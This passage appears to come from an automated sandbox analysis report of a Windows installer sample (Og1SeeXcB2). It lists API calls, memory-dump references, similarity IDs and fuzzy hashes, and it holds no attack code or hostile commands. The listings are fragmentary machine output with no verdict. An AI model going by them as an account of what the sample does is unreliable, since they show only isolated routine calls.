                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045DE
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045EC
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004045F1
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045FE
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404613
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040466C
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404673
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040469E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046E1
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004046EF
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004046F2
                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040470B
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040470E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040473D
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040474F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                  • String ID: : Completed$N$gD@
                                                                                                                                                                                                                                  • API String ID: 3103080414-1696006015
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061C2,?,?), ref: 00406062
• GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 0040606B
  • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
  • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
• GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 00406088
• wsprintfA.USER32 ref: 004060A6
• GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 004060E1
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060F0
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406128
• SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 0040617E
• GlobalFree.KERNEL32(00000000), ref: 0040618F
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406196
  • Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
  • Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
Strings
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004043B5
• GetSysColor.USER32(00000000), ref: 004043F3
• SetTextColor.GDI32(?,00000000), ref: 004043FF
• SetBkMode.GDI32(?,?), ref: 0040440B
• GetSysColor.USER32(?), ref: 0040441E
• SetBkColor.GDI32(?,?), ref: 0040442E
• DeleteObject.GDI32(?), ref: 00404448
• CreateBrushIndirect.GDI32(?), ref: 00404452
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                                                                  • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                                                                  • Instruction ID: 9b2ff1ab0d94660d7576f8ed4a98babdba82e7b09994482354a54f078556bf7c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B2162715007089BCB20DF38D948B5BBBF8AF80714B04892EE996A26E1D734E904CF59
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 00402750
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
  • Part of subcall function 00405FB2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FC8
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
• Instruction ID: 536e03bdd217ed40317c2037eab2912bbb9466327a1cdf3ab0e42e9fe4cfd002
• Opcode Fuzzy Hash: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
• Instruction Fuzzy Hash: 2751F975D00219EBDF20DF95CA89AAEBB79FF04304F50817BE501B62D0E7B49D828B58
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
• CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
• CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
• CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-4010320282
• Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
• Instruction ID: c93b7236ce9398e1af64c827f7f3df25a4e663042e3c0a86589bb20fd507ce77
• Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
• Instruction Fuzzy Hash: 6111CB2580061195DB3037548C84B7762E8EF547A4F52443FED86B32C0E77D5CA286BD
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D07
• GetMessagePos.USER32 ref: 00404D0F
• ScreenToClient.USER32(?,?), ref: 00404D29
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D3B
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D61
Strings
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
• Instruction ID: 38a9b76ebff3d9b0285b36f379b71c5e366e7bff37b4726e352de3fe70b617dc
• Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
• Instruction Fuzzy Hash: DF014C71900219BBDB10DBA4DD85BFEBBB8AF95B11F10012BBA50B61C0D6B49A058BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
• MulDiv.KERNEL32(00019C00,00000064,000C230D), ref: 00402F74
• wsprintfW.USER32 ref: 00402F84
• SetWindowTextW.USER32(?,?), ref: 00402F94
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
Strings
• verifying installer: %d%%, xrefs: 00402F7E
Memory Dump Source
• Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                  • Opcode ID: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                                                                                                                                                                                  • Instruction ID: f70e2e9d3cdf76f376be3492476da2a97ecf935c4d8f5b4406c9d83c61a08eb5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7014470640209BBEF209F60DE4AFEA3B79FB44345F008039FA06A51D1DBB989559F5C
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405969
                                                                                                                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040597E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405988
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                                                                                                                                                                                                                                  • C:\Users\user\Desktop, xrefs: 00405912
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                                  • API String ID: 3449924974-2028306314
                                                                                                                                                                                                                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                  • Instruction ID: dda0a131242ff184f2ccb02743bd446f17612fd9a9d8f3d2581d745ec2ea809b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 010108B1C00219EADF009BA0C944BEFBBB4EB04364F00803AD945B6180D77996488FA9
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                                                                                                                  • Opcode ID: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
                                                                                                                                                                                                                                  • Instruction ID: ed14628ef15dceb457173a83ab12e15034626edc11f01d0ebe9f464a1ada349c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A821C171800128BBCF216FA5DE49D9F7E79EF05364F20023AF564762E1CB794D419BA8
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1354259210-0
                                                                                                                                                                                                                                  • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                                                                                                                                                  • Instruction ID: 0e68a9e52e1d6489b1d96d2929a27e43e5cdd4abb6d38d1bd7d6776dab24ddff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11A0E7B48E54AAA8
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D9A
